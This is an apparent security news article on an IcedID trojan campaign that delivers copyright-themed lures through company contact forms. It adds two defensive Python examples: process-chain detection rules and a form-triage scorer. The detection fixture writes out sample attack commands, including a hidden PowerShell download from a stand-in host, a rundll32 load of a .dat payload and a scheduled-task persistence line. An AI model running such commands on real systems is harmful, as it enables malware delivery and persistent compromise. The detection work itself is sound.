Posted on April 13, 2021 at 6:54 PM
Microsoft has discovered that some threat actors are planting the IcedID information-stealing banking trojan using companies’ website contact forms. According to the warning, the attackers evade email spam filters by submitting their lures through web-based “contact us” forms.
The threat actors are also utilizing Google URLs to spread the Trojan, according to Microsoft researchers.
The messages consistently claim copyright infringement by a designer, an illustrator, or a photographer. They purportedly contain links to “evidence” of the legal infraction, but in reality the link leads directly to a Google page that downloads IcedID, a loader and information stealer for other malware.
The messages use urgent and strong language, pressuring the recipient to act swiftly and cajoling them to click on the link about the supposed legal action.
The Microsoft researchers discovered that the threat actors used fake names beginning with “Mel”, such as “Meleena” or “Melanie”, to deceive the users.
The links redirect the victims to the sites.google.com page which directs them to sign in to the page. After the user signs in, a malicious .ZIP file is automatically downloaded. It contains unpacked .JS files that are heavily obfuscated, according to the researchers.
They added that the .JS file is executed through WScript, which generates a shell object that delivers PowerShell and downloads the IcedID payload as a .DAT file.
The file carries a Cobalt Strike beacon in the form of a stageless DLL, which gives the threat actors remote control of the user’s system. Cobalt Strike is a penetration-testing tool whose beacons are normally used to find weaknesses in a network; used for its intended purpose, it simulates an attack. But hackers are now taking advantage of its usability and turning it against networks.
The threat actors also delivered secondary payloads
According to the Microsoft analysis, the downloaded .DAT file is loaded through the rundll32 executable. Once the download is complete, it runs several information-gathering commands, including delivering SQLite for accessing banking databases, getting system and domain details, and getting the IP addresses of the targets.
When it is run, IcedID links to a command-and-control server (C2) that downloads modules that capture and exfiltrate banking credentials as well as other information, Microsoft said.
By scheduling tasks, it achieves persistence and downloads implants such as Cobalt Strike and other tools, which enable the remote attackers to execute malicious code on the compromised system.
The Microsoft researchers also noted that the Trojan enables the threat actors to deliver secondary payloads, move around the system in search of important data, and collect additional credentials.
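The execution chain described above (a downloaded .JS file run by WScript, which spawns PowerShell, which fetches a .DAT file that rundll32 loads, followed by a scheduled task for persistence) is exactly the kind of parent/child process pattern an endpoint detection rule can flag. The following is an added example written for this article, not code from Microsoft or from the article itself. It runs a handful of simple rules over constructed process-creation records in the shape a Sysmon Event ID 1 or EDR feed would provide (the field names ParentImage, Image and CommandLine are assumed; the file paths, export name and task name in the sample events are made up).

```python
import re

# Constructed sample events mimicking the chain the article describes.
# Every path, host and export name here is made up for illustration.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'wscript.exe "C:\Users\alice\Downloads\evidence_12\docs.js"'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -w hidden -c "iwr http://lure.example.invalid/p -OutFile C:\Users\alice\AppData\Local\Temp\x.dat"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dat,update"},
    {"ParentImage": r"C:\Windows\System32\rundll32.exe",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks.exe /Create /SC MINUTE /MO 60 /TN Updater /TR C:\Users\alice\AppData\Local\Temp\x.dat"},
    # Benign control event: should produce no alert.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DAT_RE = re.compile(r"\.dat\b", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def script_host_runs_downloaded_js(e):
    # Step 1 of the chain: a script host executing a .js file from the Downloads folder.
    return basename(e["Image"]) in SCRIPT_HOSTS and bool(
        re.search(r"\\downloads\\.*\.js\b", e["CommandLine"], re.I))


def script_host_spawns_powershell(e):
    # Step 2: WScript/CScript creating a shell object that launches PowerShell.
    return basename(e["ParentImage"]) in SCRIPT_HOSTS and basename(e["Image"]) == "powershell.exe"


def rundll32_loads_dat(e):
    # Step 3: rundll32 handed a .dat file instead of a DLL.
    return basename(e["Image"]) == "rundll32.exe" and bool(DAT_RE.search(e["CommandLine"]))


def scheduled_task_persists_dat(e):
    # Step 4: persistence via a scheduled task whose action points at a .dat file.
    cmd = e["CommandLine"]
    return (basename(e["Image"]) == "schtasks.exe"
            and "/create" in cmd.lower()
            and bool(DAT_RE.search(cmd)))


RULES = [
    script_host_runs_downloaded_js,
    script_host_spawns_powershell,
    rundll32_loads_dat,
    scheduled_task_persists_dat,
]


def alert_names(events):
    """Return the names of every rule that fires, in event order."""
    hits = []
    for e in events:
        for rule in RULES:
            if rule(e):
                hits.append(rule.__name__)
    return hits


if __name__ == "__main__":
    for name in alert_names(SAMPLE_EVENTS):
        print("ALERT:", name)
```

Each rule on its own will produce some benign noise (administrators do run scripts from Downloads), which is why the four are kept as separate signals: seeing three or four of them from one user in a short window is far stronger evidence of this loader chain than any single hit.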
The attackers have also prepared a secondary attack chain, to be used in case the original sites.google page is taken down.
In the secondary chain, the targets are directed to the main domain. Additionally, the researchers revealed that the forms delivered to the users contain malicious sites.google links, which download the IcedID malware.
The increasing spate of social engineering campaigns
The social engineering method has been at play here once again. In this case, the attackers used website contact forms to get the campaign’s messages past email spam filters, according to the researchers.
The malicious email looks particularly genuine, which makes it easier to convince the user. It looks trustworthy because it is sent directly from genuine email marketing systems, which also makes it easier to evade detection.
“The email templates match what they would expect from an actual customer interaction or inquiry,” the researchers stated.
Also, the use of sign-in requests and a Google page enabled the threat actors to evade detection.
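Because the lure arrives through the company's own contact form rather than as inbound mail, the place to catch it is the form handler itself, before the notification is mailed to staff. The following is an added example written for this article, not code from Microsoft or from the article itself: a triage function that scores a submission on the indicators the article names (a link to a sites.google.com page, copyright or legal-action language, urgency, and a sender first name starting with “Mel”) and holds high-scoring messages for review. The submissions, the field names (name, email, message), the term lists and the score thresholds are all constructed assumptions.

```python
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+", re.I)

# The article names sites.google.com as the landing page used by this campaign.
LURE_HOSTS = {"sites.google.com"}
# Constructed term lists; tune to the language your own forms normally receive.
LEGAL_TERMS = ("copyright", "infringement", "legal action", "lawsuit", "attorney")
URGENCY_TERMS = ("immediately", "within 24 hours", "right away", "urgent")

# Constructed sample submissions: one lure modelled on the article's description, one benign enquiry.
SAMPLE_SUBMISSIONS = [
    {"name": "Meleena", "email": "mel@sender.example.invalid",
     "message": ("You are using my photographs on your site without permission. This is copyright "
                 "infringement. See the evidence here: https://sites.google.com/view/evidence-1234 "
                 "and remove them immediately or I will take legal action.")},
    {"name": "Dana", "email": "dana@customer.example.invalid",
     "message": ("Hi, I saw your pricing page at https://www.example.com/pricing and have a "
                 "question about volume discounts.")},
]


def link_hosts(text):
    """Hostnames of every URL found in the message body, lower-cased."""
    return [(urlparse(u).hostname or "").lower() for u in URL_RE.findall(text)]


def triage(submission):
    """Score one contact-form submission and decide whether to hold it for review."""
    text = submission["message"].lower()
    reasons = []
    score = 0

    # The strongest signal: a link to the lure host the campaign relies on.
    if any(h in LURE_HOSTS for h in link_hosts(submission["message"])):
        reasons.append("link_to_lure_host")
        score += 3
    if any(t in text for t in LEGAL_TERMS):
        reasons.append("legal_threat")
        score += 1
    if any(t in text for t in URGENCY_TERMS):
        reasons.append("urgency")
        score += 1
    # Weak, campaign-specific signal from the article; on its own it should never block a message.
    if submission["name"].strip().lower().startswith("mel"):
        reasons.append("sender_name_pattern")
        score += 1

    verdict = "hold_for_review" if score >= 3 else "deliver"
    return {"score": score, "reasons": reasons, "verdict": verdict}


if __name__ == "__main__":
    for s in SAMPLE_SUBMISSIONS:
        print(s["name"], triage(s))
```

The weights are deliberately skewed so that only the link to the lure host can push a message over the threshold by itself; legal language and urgency are common in genuine complaints and only add confidence. Held messages should still reach a human, since a real copyright claim deserves a reply.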
Other IcedID campaign activities were recently observed by researchers, and this adds to a growing number of such campaigns.
Last week, Uptycs researchers pointed out that they had discovered a series of email campaigns that use Microsoft Excel spreadsheet file attachments. Other similar campaigns use different social engineering methods to trick their victims and evade detection.
Security researchers have warned about the effectiveness of such campaigns, since they are rarely stopped by antivirus and malware-prevention software. As a result, users are asked to protect their systems by staying alert and refusing to open links. Even if they believe a site is genuine, they should instead type the site’s address themselves if they need to check it out, the security researchers advised.